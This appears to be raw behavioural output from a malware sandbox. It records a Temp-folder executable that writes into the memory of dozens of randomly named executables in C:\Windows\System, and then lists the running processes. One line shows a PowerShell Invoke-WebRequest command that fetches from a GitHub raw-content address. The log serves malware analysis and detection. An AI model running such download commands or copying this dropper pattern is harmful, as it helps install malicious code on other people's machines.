PID 3024 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\aFHiKLS.exe
PID 3024 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\aFHiKLS.exe
PID 3024 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\aFHiKLS.exe
PID 3024 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\CPsMpIJ.exe
PID 3024 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\CPsMpIJ.exe
PID 3024 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\CPsMpIJ.exe
PID 3024 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\lMouqlA.exe
PID 3024 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\lMouqlA.exe
PID 3024 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\lMouqlA.exe
PID 3024 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\RhHVibn.exe
PID 3024 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\RhHVibn.exe
PID 3024 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\RhHVibn.exe
PID 3024 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\aaqKwHW.exe
PID 3024 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\aaqKwHW.exe
PID 3024 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\aaqKwHW.exe
PID 3024 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\SKvETSg.exe
PID 3024 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\SKvETSg.exe
PID 3024 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\SKvETSg.exe
PID 3024 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\CXuPzIZ.exe
PID 3024 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\CXuPzIZ.exe
PID 3024 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\CXuPzIZ.exe
PID 3024 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\Fedxevy.exe
PID 3024 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\Fedxevy.exe
PID 3024 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\Fedxevy.exe
PID 3024 wrote to memory of 1628 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\EPoxBxP.exe
PID 3024 wrote to memory of 1628 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\EPoxBxP.exe
PID 3024 wrote to memory of 1628 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\EPoxBxP.exe
PID 3024 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\jxeMTPD.exe
PID 3024 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\jxeMTPD.exe
PID 3024 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\jxeMTPD.exe
PID 3024 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\vzYzWzB.exe
PID 3024 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\vzYzWzB.exe
PID 3024 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\vzYzWzB.exe
PID 3024 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\OlBxnGD.exe
PID 3024 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\OlBxnGD.exe
PID 3024 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\OlBxnGD.exe
PID 3024 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\NmlVIiL.exe
PID 3024 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\NmlVIiL.exe
PID 3024 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\NmlVIiL.exe
PID 3024 wrote to memory of 380 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\aeNtqSw.exe
PID 3024 wrote to memory of 380 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\aeNtqSw.exe
PID 3024 wrote to memory of 380 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\aeNtqSw.exe
PID 3024 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\IaWMBNb.exe
PID 3024 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\IaWMBNb.exe
PID 3024 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\IaWMBNb.exe
PID 3024 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\HHpPBpc.exe
PID 3024 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\HHpPBpc.exe
PID 3024 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\HHpPBpc.exe
PID 3024 wrote to memory of 668 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\HKFXKCj.exe
PID 3024 wrote to memory of 668 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\HKFXKCj.exe
PID 3024 wrote to memory of 668 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\HKFXKCj.exe
PID 3024 wrote to memory of 1292 N/A C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe C:\Windows\System\WWGMLDG.exe

Processes

C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\22b93a1accfea55fa232b6805ae88e60_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\PigjwOV.exe

C:\Windows\System\PigjwOV.exe

C:\Windows\System\biHOyov.exe

C:\Windows\System\biHOyov.exe

C:\Windows\System\QDAlBoD.exe

C:\Windows\System\QDAlBoD.exe

C:\Windows\System\aFHiKLS.exe

C:\Windows\System\aFHiKLS.exe

C:\Windows\System\CPsMpIJ.exe

C:\Windows\System\CPsMpIJ.exe

C:\Windows\System\lMouqlA.exe

C:\Windows\System\lMouqlA.exe

C:\Windows\System\RhHVibn.exe

C:\Windows\System\RhHVibn.exe

C:\Windows\System\aaqKwHW.exe

C:\Windows\System\aaqKwHW.exe

C:\Windows\System\SKvETSg.exe

C:\Windows\System\SKvETSg.exe

C:\Windows\System\CXuPzIZ.exe

C:\Windows\System\CXuPzIZ.exe

C:\Windows\System\Fedxevy.exe

C:\Windows\System\Fedxevy.exe

C:\Windows\System\EPoxBxP.exe

C:\Windows\System\EPoxBxP.exe

C:\Windows\System\jxeMTPD.exe

C:\Windows\System\jxeMTPD.exe

C:\Windows\System\vzYzWzB.exe

C:\Windows\System\vzYzWzB.exe

C:\Windows\System\OlBxnGD.exe

C:\Windows\System\OlBxnGD.exe

C:\Windows\System\NmlVIiL.exe

C:\Windows\System\NmlVIiL.exe

C:\Windows\System\aeNtqSw.exe

C:\Windows\System\aeNtqSw.exe

C:\Windows\System\IaWMBNb.exe

C:\Windows\System\IaWMBNb.exe

C:\Windows\System\HHpPBpc.exe

C:\Windows\System\HHpPBpc.exe

C:\Windows\System\HKFXKCj.exe

C:\Windows\System\HKFXKCj.exe

C:\Windows\System\WWGMLDG.exe

C:\Windows\System\WWGMLDG.exe

C:\Windows\System\QqsRSyx.exe

C:\Windows\System\QqsRSyx.exe

C:\Windows\System\CtqiLgi.exe

C:\Windows\System\CtqiLgi.exe

C:\Windows\System\mKJlZes.exe

C:\Windows\System\mKJlZes.exe

C:\Windows\System\kJymasj.exe

C:\Windows\System\kJymasj.exe

C:\Windows\System\LVdrRmy.exe

C:\Windows\System\LVdrRmy.exe

C:\Windows\System\siHpAVP.exe

C:\Windows\System\siHpAVP.exe

C:\Windows\System\LIwrXIg.exe

C:\Windows\System\LIwrXIg.exe

C:\Windows\System\hmoVzXV.exe

C:\Windows\System\hmoVzXV.exe

C:\Windows\System\DMBAsuQ.exe

C:\Windows\System\DMBAsuQ.exe

C:\Windows\System\mJJVOuY.exe

C:\Windows\System\mJJVOuY.exe

C:\Windows\System\XdwqfbZ.exe

C:\Windows\System\XdwqfbZ.exe

C:\Windows\System\YshwZtq.exe

C:\Windows\System\YshwZtq.exe

C:\Windows\System\hAITjFG.exe

C:\Windows\System\hAITjFG.exe

C:\Windows\System\BLbNZbb.exe

C:\Windows\System\BLbNZbb.exe

C:\Windows\System\PBxEKKt.exe

C:\Windows\System\PBxEKKt.exe

C:\Windows\System\YMcBWoU.exe

C:\Windows\System\YMcBWoU.exe

C:\Windows\System\RayQiMa.exe

C:\Windows\System\RayQiMa.exe

C:\Windows\System\FIzboHd.exe

C:\Windows\System\FIzboHd.exe

C:\Windows\System\ggnNHta.exe

C:\Windows\System\ggnNHta.exe

C:\Windows\System\xtmBZSx.exe

C:\Windows\System\xtmBZSx.exe

C:\Windows\System\gbvdihC.exe

C:\Windows\System\gbvdihC.exe

C:\Windows\System\OCuKRNG.exe

C:\Windows\System\OCuKRNG.exe

C:\Windows\System\Ldzazvs.exe

C:\Windows\System\Ldzazvs.exe

C:\Windows\System\tCuUmqW.exe

C:\Windows\System\tCuUmqW.exe

C:\Windows\System\QfECWlL.exe

C:\Windows\System\QfECWlL.exe

C:\Windows\System\FydgYRf.exe

C:\Windows\System\FydgYRf.exe

C:\Windows\System\KDxacMN.exe

C:\Windows\System\KDxacMN.exe

C:\Windows\System\OAZSFQr.exe

C:\Windows\System\OAZSFQr.exe

C:\Windows\System\XStNXuo.exe

C:\Windows\System\XStNXuo.exe

C:\Windows\System\qWxpPNz.exe

C:\Windows\System\qWxpPNz.exe

C:\Windows\System\ofjzRdH.exe

C:\Windows\System\ofjzRdH.exe

C:\Windows\System\GLmTBRC.exe

C:\Windows\System\GLmTBRC.exe

C:\Windows\System\LQaLAHM.exe

C:\Windows\System\LQaLAHM.exe

C:\Windows\System\oOSTrIu.exe

C:\Windows\System\oOSTrIu.exe

C:\Windows\System\maHhlti.exe

C:\Windows\System\maHhlti.exe

C:\Windows\System\oofflXr.exe

C:\Windows\System\oofflXr.exe

C:\Windows\System\mfRLnAU.exe

C:\Windows\System\mfRLnAU.exe

C:\Windows\System\uQHnSUA.exe

C:\Windows\System\uQHnSUA.exe

C:\Windows\System\kOZatxF.exe

C:\Windows\System\kOZatxF.exe

C:\Windows\System\ixOxQuN.exe

C:\Windows\System\ixOxQuN.exe

C:\Windows\System\DXmuuEL.exe

C:\Windows\System\DXmuuEL.exe

C:\Windows\System\vvxlkPU.exe

C:\Windows\System\vvxlkPU.exe

C:\Windows\System\VvJNLbI.exe

C:\Windows\System\VvJNLbI.exe

C:\Windows\System\sThvfZu.exe

C:\Windows\System\sThvfZu.exe

C:\Windows\System\PYpizrC.exe

C:\Windows\System\PYpizrC.exe

C:\Windows\System\CyIDHIQ.exe

C:\Windows\System\CyIDHIQ.exe

C:\Windows\System\XODRrIe.exe

C:\Windows\System\XODRrIe.exe

C:\Windows\System\KqewKos.exe

C:\Windows\System\KqewKos.exe

C:\Windows\System\sNlgGEg.exe

C:\Windows\System\sNlgGEg.exe

C:\Windows\System\qvxVGDZ.exe

C:\Windows\System\qvxVGDZ.exe

C:\Windows\System\VFuYonB.exe

C:\Windows\System\VFuYonB.exe

C:\Windows\System\vBWxdCt.exe

C:\Windows\System\vBWxdCt.exe

C:\Windows\System\xxYTmVG.exe

C:\Windows\System\xxYTmVG.exe

C:\Windows\System\QyFBJrb.exe

C:\Windows\System\QyFBJrb.exe

C:\Windows\System\wQeGlPz.exe

C:\Windows\System\wQeGlPz.exe

C:\Windows\System\cgSycji.exe

C:\Windows\System\cgSycji.exe

C:\Windows\System\NViZYZY.exe

C:\Windows\System\NViZYZY.exe

C:\Windows\System\AjvcoEf.exe

C:\Windows\System\AjvcoEf.exe

C:\Windows\System\dMaTIwc.exe

C:\Windows\System\dMaTIwc.exe

C:\Windows\System\LdrMvxa.exe

C:\Windows\System\LdrMvxa.exe

C:\Windows\System\prsvSvF.exe

C:\Windows\System\prsvSvF.exe

C:\Windows\System\MSrziml.exe

C:\Windows\System\MSrziml.exe

C:\Windows\System\iwYsQsV.exe

C:\Windows\System\iwYsQsV.exe

C:\Windows\System\LanOPOG.exe

C:\Windows\System\LanOPOG.exe

C:\Windows\System\ONOykUl.exe

C:\Windows\System\ONOykUl.exe

C:\Windows\System\aGTXRfJ.exe

C:\Windows\System\aGTXRfJ.exe

C:\Windows\System\jINDdul.exe

C:\Windows\System\jINDdul.exe

C:\Windows\System\KjYjHTl.exe

C:\Windows\System\KjYjHTl.exe

C:\Windows\System\BGcIBnm.exe

C:\Windows\System\BGcIBnm.exe

C:\Windows\System\eqXKZJs.exe

C:\Windows\System\eqXKZJs.exe

C:\Windows\System\bzAcxKZ.exe

C:\Windows\System\bzAcxKZ.exe

C:\Windows\System\hQdetZN.exe

C:\Windows\System\hQdetZN.exe

C:\Windows\System\sRKitIo.exe

C:\Windows\System\sRKitIo.exe

C:\Windows\System\rthvweU.exe

C:\Windows\System\rthvweU.exe

C:\Windows\System\fVQHyDL.exe

C:\Windows\System\fVQHyDL.exe

C:\Windows\System\TAuFuEi.exe

C:\Windows\System\TAuFuEi.exe

C:\Windows\System\GNEULcs.exe

C:\Windows\System\GNEULcs.exe

C:\Windows\System\PdhNtMO.exe

C:\Windows\System\PdhNtMO.exe

C:\Windows\System\ZNxlxjH.exe

C:\Windows\System\ZNxlxjH.exe

C:\Windows\System\fkmkwnQ.exe

C:\Windows\System\fkmkwnQ.exe

C:\Windows\System\oVMLsDB.exe

C:\Windows\System\oVMLsDB.exe

C:\Windows\System\kPsabXn.exe

C:\Windows\System\kPsabXn.exe

C:\Windows\System\tuVZGpb.exe

C:\Windows\System\tuVZGpb.exe

C:\Windows\System\kwksfPa.exe

C:\Windows\System\kwksfPa.exe

C:\Windows\System\PCRJhYs.exe

C:\Windows\System\PCRJhYs.exe

C:\Windows\System\ZMpatXF.exe

C:\Windows\System\ZMpatXF.exe

C:\Windows\System\mmYvKvj.exe

C:\Windows\System\mmYvKvj.exe

C:\Windows\System\csdHZez.exe

C:\Windows\System\csdHZez.exe

C:\Windows\System\IdSbIJO.exe

C:\Windows\System\IdSbIJO.exe

C:\Windows\System\bKEYaGx.exe

C:\Windows\System\bKEYaGx.exe

C:\Windows\System\RbqYgUP.exe

C:\Windows\System\RbqYgUP.exe

C:\Windows\System\IiYrkxS.exe

C:\Windows\System\IiYrkxS.exe

C:\Windows\System\iKtGmMV.exe

C:\Windows\System\iKtGmMV.exe

C:\Windows\System\IFyCCvT.exe

C:\Windows\System\IFyCCvT.exe

C:\Windows\System\objxsiA.exe

C:\Windows\System\objxsiA.exe

C:\Windows\System\uwjmWeA.exe

C:\Windows\System\uwjmWeA.exe

C:\Windows\System\dVlaERm.exe

C:\Windows\System\dVlaERm.exe

C:\Windows\System\DYxGhkN.exe

C:\Windows\System\DYxGhkN.exe

C:\Windows\System\RTZVhdy.exe

C:\Windows\System\RTZVhdy.exe

C:\Windows\System\wyczuYh.exe

C:\Windows\System\wyczuYh.exe

C:\Windows\System\PqAIcsF.exe

C:\Windows\System\PqAIcsF.exe

C:\Windows\System\IuXMsGC.exe

C:\Windows\System\IuXMsGC.exe

C:\Windows\System\nXgijtl.exe

C:\Windows\System\nXgijtl.exe

C:\Windows\System\eCFovNF.exe

C:\Windows\System\eCFovNF.exe

C:\Windows\System\fcifroP.exe

C:\Windows\System\fcifroP.exe

C:\Windows\System\FJaoUrm.exe

C:\Windows\System\FJaoUrm.exe

C:\Windows\System\JEVrnlL.exe

C:\Windows\System\JEVrnlL.exe

C:\Windows\System\TRkhyco.exe

C:\Windows\System\TRkhyco.exe

C:\Windows\System\aEvZRig.exe

C:\Windows\System\aEvZRig.exe

C:\Windows\System\qXxVbdC.exe

C:\Windows\System\qXxVbdC.exe

C:\Windows\System\VsUKMvD.exe

C:\Windows\System\VsUKMvD.exe

C:\Windows\System\dulXsWw.exe

C:\Windows\System\dulXsWw.exe

C:\Windows\System\czEgWXQ.exe

C:\Windows\System\czEgWXQ.exe

C:\Windows\System\fOKvZFI.exe

C:\Windows\System\fOKvZFI.exe

C:\Windows\System\sWuCiYV.exe

C:\Windows\System\sWuCiYV.exe

C:\Windows\System\tdDnLkv.exe

C:\Windows\System\tdDnLkv.exe

C:\Windows\System\SaWbBPl.exe

C:\Windows\System\SaWbBPl.exe

C:\Windows\System\vlAhigj.exe

C:\Windows\System\vlAhigj.exe

C:\Windows\System\RdxJjcy.exe

C:\Windows\System\RdxJjcy.exe

C:\Windows\System\pNLaqzO.exe

C:\Windows\System\pNLaqzO.exe

C:\Windows\System\HHzwVHP.exe

C:\Windows\System\HHzwVHP.exe

C:\Windows\System\GFcUHUr.exe

C:\Windows\System\GFcUHUr.exe

C:\Windows\System\EAnVlnn.exe

C:\Windows\System\EAnVlnn.exe

C:\Windows\System\ZtvWcNQ.exe

C:\Windows\System\ZtvWcNQ.exe

C:\Windows\System\GKaaklR.exe

C:\Windows\System\GKaaklR.exe

C:\Windows\System\EEdHXwc.exe

C:\Windows\System\EEdHXwc.exe

C:\Windows\System\qGliAwc.exe

C:\Windows\System\qGliAwc.exe

C:\Windows\System\rMkNQRc.exe

C:\Windows\System\rMkNQRc.exe

C:\Windows\System\FlnmKhl.exe

C:\Windows\System\FlnmKhl.exe

C:\Windows\System\IEOdzMp.exe

C:\Windows\System\IEOdzMp.exe

C:\Windows\System\QDBNDOk.exe

C:\Windows\System\QDBNDOk.exe

C:\Windows\System\kanBLlA.exe

C:\Windows\System\kanBLlA.exe

C:\Windows\System\RTWJCRU.exe

C:\Windows\System\RTWJCRU.exe

C:\Windows\System\gQoTnai.exe

C:\Windows\System\gQoTnai.exe

C:\Windows\System\dcWobfK.exe

C:\Windows\System\dcWobfK.exe

C:\Windows\System\bMRHrsA.exe

C:\Windows\System\bMRHrsA.exe

C:\Windows\System\ffyutlg.exe

C:\Windows\System\ffyutlg.exe

C:\Windows\System\FaHDZdE.exe

C:\Windows\System\FaHDZdE.exe

C:\Windows\System\LYkEmgA.exe

C:\Windows\System\LYkEmgA.exe

C:\Windows\System\OESTOBG.exe

C:\Windows\System\OESTOBG.exe

C:\Windows\System\rhIxrfB.exe

C:\Windows\System\rhIxrfB.exe

C:\Windows\System\BWTIzsE.exe

C:\Windows\System\BWTIzsE.exe

C:\Windows\System\YZAekCm.exe

C:\Windows\System\YZAekCm.exe

C:\Windows\System\eCZcuqi.exe

C:\Windows\System\eCZcuqi.exe

C:\Windows\System\hdEcppD.exe

C:\Windows\System\hdEcppD.exe

C:\Windows\System\XuDeeLm.exe

C:\Windows\System\XuDeeLm.exe

C:\Windows\System\iaTBmfL.exe

C:\Windows\System\iaTBmfL.exe

C:\Windows\System\VMwVUnI.exe

C:\Windows\System\VMwVUnI.exe

C:\Windows\System\scnhmUQ.exe

C:\Windows\System\scnhmUQ.exe

C:\Windows\System\HcBeGul.exe

C:\Windows\System\HcBeGul.exe

C:\Windows\System\SIKkAaj.exe

C:\Windows\System\SIKkAaj.exe

C:\Windows\System\CpnNSKT.exe

C:\Windows\System\CpnNSKT.exe

C:\Windows\System\tPFtpId.exe

C:\Windows\System\tPFtpId.exe

C:\Windows\System\yfSBbmv.exe

C:\Windows\System\yfSBbmv.exe

C:\Windows\System\wZkaaZT.exe

C:\Windows\System\wZkaaZT.exe

C:\Windows\System\jwhVGlS.exe

C:\Windows\System\jwhVGlS.exe

C:\Windows\System\JhBDrPY.exe

C:\Windows\System\JhBDrPY.exe

C:\Windows\System\qnSweZJ.exe

C:\Windows\System\qnSweZJ.exe

C:\Windows\System\EINQCWh.exe

C:\Windows\System\EINQCWh.exe

C:\Windows\System\aLxozMz.exe

C:\Windows\System\aLxozMz.exe

C:\Windows\System\tDryzBZ.exe

C:\Windows\System\tDryzBZ.exe

C:\Windows\System\zCnvbvI.exe

C:\Windows\System\zCnvbvI.exe

C:\Windows\System\nGzBJVg.exe

C:\Windows\System\nGzBJVg.exe

C:\Windows\System\livZxrE.exe

C:\Windows\System\livZxrE.exe

C:\Windows\System\rsbEqcU.exe

C:\Windows\System\rsbEqcU.exe

C:\Windows\System\dikZmhW.exe

C:\Windows\System\dikZmhW.exe

C:\Windows\System\bLNwwzy.exe

C:\Windows\System\bLNwwzy.exe

C:\Windows\System\mFPiMsr.exe

C:\Windows\System\mFPiMsr.exe

C:\Windows\System\keJSDvD.exe

C:\Windows\System\keJSDvD.exe

C:\Windows\System\HMxJrJR.exe

C:\Windows\System\HMxJrJR.exe

C:\Windows\System\AgaQoFN.exe

C:\Windows\System\AgaQoFN.exe

C:\Windows\System\nslMwsS.exe

C:\Windows\System\nslMwsS.exe

C:\Windows\System\snpcNqg.exe

C:\Windows\System\snpcNqg.exe

C:\Windows\System\FjxnXyb.exe

C:\Windows\System\FjxnXyb.exe

C:\Windows\System\lPQVIGU.exe

C:\Windows\System\lPQVIGU.exe

C:\Windows\System\TyDWXcL.exe

C:\Windows\System\TyDWXcL.exe

C:\Windows\System\VFRSBgN.exe

C:\Windows\System\VFRSBgN.exe

C:\Windows\System\thwzLJS.exe

C:\Windows\System\thwzLJS.exe

C:\Windows\System\GqKEQCk.exe

C:\Windows\System\GqKEQCk.exe

C:\Windows\System\xhXHXdt.exe

C:\Windows\System\xhXHXdt.exe

C:\Windows\System\LlUTjJp.exe

C:\Windows\System\LlUTjJp.exe

C:\Windows\System\wDshglE.exe

C:\Windows\System\wDshglE.exe

C:\Windows\System\oDrhhQe.exe

C:\Windows\System\oDrhhQe.exe

C:\Windows\System\MhrLFnh.exe

C:\Windows\System\MhrLFnh.exe

C:\Windows\System\faaNKPm.exe

C:\Windows\System\faaNKPm.exe

C:\Windows\System\uozGiTD.exe

C:\Windows\System\uozGiTD.exe

C:\Windows\System\KMIPPOB.exe

C:\Windows\System\KMIPPOB.exe

C:\Windows\System\IGWxIZu.exe

C:\Windows\System\IGWxIZu.exe

C:\Windows\System\WLNdosj.exe

C:\Windows\System\WLNdosj.exe

C:\Windows\System\jpwWqSq.exe

C:\Windows\System\jpwWqSq.exe

C:\Windows\System\HdwyPXf.exe

C:\Windows\System\HdwyPXf.exe

C:\Windows\System\KJOHCdZ.exe

C:\Windows\System\KJOHCdZ.exe

C:\Windows\System\WFCPuJO.exe

C:\Windows\System\WFCPuJO.exe

C:\Windows\System\eTSZYZU.exe

C:\Windows\System\eTSZYZU.exe

C:\Windows\System\HGZTKDl.exe

C:\Windows\System\HGZTKDl.exe

C:\Windows\System\chBaPKK.exe

C:\Windows\System\chBaPKK.exe

C:\Windows\System\ZVWKgfA.exe

C:\Windows\System\ZVWKgfA.exe

C:\Windows\System\gGALmfT.exe

C:\Windows\System\gGALmfT.exe

C:\Windows\System\gNipLSH.exe

C:\Windows\System\gNipLSH.exe

C:\Windows\System\gymPzQB.exe

C:\Windows\System\gymPzQB.exe

C:\Windows\System\HtrPodM.exe

C:\Windows\System\HtrPodM.exe

C:\Windows\System\AkElVCI.exe

C:\Windows\System\AkElVCI.exe

C:\Windows\System\uZBRIif.exe

C:\Windows\System\uZBRIif.exe

C:\Windows\System\PVAgCpS.exe

C:\Windows\System\PVAgCpS.exe

C:\Windows\System\PXNdBUw.exe

C:\Windows\System\PXNdBUw.exe

C:\Windows\System\KteICuI.exe

C:\Windows\System\KteICuI.exe

C:\Windows\System\kiYuNXt.exe

C:\Windows\System\kiYuNXt.exe

C:\Windows\System\gSTjhCu.exe

C:\Windows\System\gSTjhCu.exe

C:\Windows\System\rJzqtVu.exe

C:\Windows\System\rJzqtVu.exe

C:\Windows\System\oRIdbZw.exe

C:\Windows\System\oRIdbZw.exe

C:\Windows\System\BVRgPRV.exe

C:\Windows\System\BVRgPRV.exe

C:\Windows\System\HtTEAFm.exe

C:\Windows\System\HtTEAFm.exe

C:\Windows\System\AQxkMtB.exe

C:\Windows\System\AQxkMtB.exe

C:\Windows\System\RLhRUhX.exe

C:\Windows\System\RLhRUhX.exe

C:\Windows\System\fivMOPb.exe

C:\Windows\System\fivMOPb.exe

C:\Windows\System\bMCTgfA.exe

C:\Windows\System\bMCTgfA.exe

C:\Windows\System\buLJVFU.exe

C:\Windows\System\buLJVFU.exe

C:\Windows\System\iZGQzMd.exe

C:\Windows\System\iZGQzMd.exe

C:\Windows\System\liRYwvh.exe

C:\Windows\System\liRYwvh.exe

C:\Windows\System\CDJBMky.exe

C:\Windows\System\CDJBMky.exe

C:\Windows\System\iuVwluu.exe

C:\Windows\System\iuVwluu.exe

C:\Windows\System\PfWVnTS.exe

C:\Windows\System\PfWVnTS.exe

C:\Windows\System\lxBdrEl.exe

C:\Windows\System\lxBdrEl.exe

C:\Windows\System\ESuOyKF.exe

C:\Windows\System\ESuOyKF.exe

C:\Windows\System\uufEBAb.exe

C:\Windows\System\uufEBAb.exe

C:\Windows\System\NFLaDNE.exe

C:\Windows\System\NFLaDNE.exe

C:\Windows\System\kcZkGmY.exe

C:\Windows\System\kcZkGmY.exe

C:\Windows\System\nBIMQhb.exe

C:\Windows\System\nBIMQhb.exe

C:\Windows\System\GcKlhQN.exe

C:\Windows\System\GcKlhQN.exe

C:\Windows\System\FkxNiEs.exe

C:\Windows\System\FkxNiEs.exe

C:\Windows\System\MJRwIgD.exe

C:\Windows\System\MJRwIgD.exe

C:\Windows\System\dbKkCQD.exe

